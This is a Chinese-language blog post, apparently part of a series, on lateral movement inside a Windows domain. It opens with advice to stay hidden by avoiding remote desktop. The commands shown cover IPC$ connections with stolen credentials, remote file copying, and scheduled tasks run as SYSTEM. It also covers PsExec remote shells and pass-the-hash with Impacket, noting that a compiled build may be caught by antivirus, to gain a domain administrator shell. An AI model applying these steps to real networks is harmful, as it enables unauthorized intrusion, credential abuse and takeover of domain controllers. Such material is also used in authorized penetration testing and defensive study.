在内网渗透时,如果登录远程桌面,容易暴露自己,所以还是尽可能使用命令行操作比较好

建立ipc连接

net use \[ip] /u:域名 [密码]

例:net use \192.168.83.10 /u:TESTAdministrator Iamtest123

1.jpeg

net use 查看建立的ipc连接

2.jpeg

net use \192.168.83.10 /de /y 删除ipc连接

3.jpeg

net view \192.168.83.10 查看共享了哪些磁盘

4.jpeg

dir \192.168.83.10c$ 查看c盘目录

5.jpeg

copy xxxx \192.168.83.2c$ 上传文件到c盘

6.jpeg

7.jpeg

copy \192.168.83.2c$xxx c: 下载文件到c盘

8.jpeg

利用schtasks计划任务执行命令(不需要先创立ipc连接)

创建计划任务

schtasks /create /tn 任务名 /U 域\域用户 /P 域用户密码 /tr 执行的命令或bat路径 /sc ONSTART /s 域机子IP /RU system

执行计划任务

schtasks /run /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码

删除计划任务

schtasks /F /delete /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码

9.jpeg

PsExec

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
https://github.com/Al1ex/smbexec/releases
首先需要创建ipc连接

执行命令PsExec.exe \192.168.83.10 -s cmd.exe -accepteula,然后等待一段时间,弹回shell

10.jpeg

hash传递

另外我上篇抓取密码的文章中提到可以抓取密码的hash,我们可以通过该工具实现NTLM hash的传递
下载地址:https://github.com/SecureAuthCorp/impacket
上面的psexec.exe是微软的,并没有hash传递的功能

将Impacket中examples目录下的psexec.py用pyinstaller编译一下(编译完后有概率会被杀掉),生成psexec.exe文件
上传到服务器,使用命令:psexec.exe -hashes :xxxxxxxxxxxxxx TEST/[email protected]获得域控管理员的shell

11.jpeg

退出还会清掉文件

12.jpeg

不好的就是中文会乱码

标签: none

添加新评论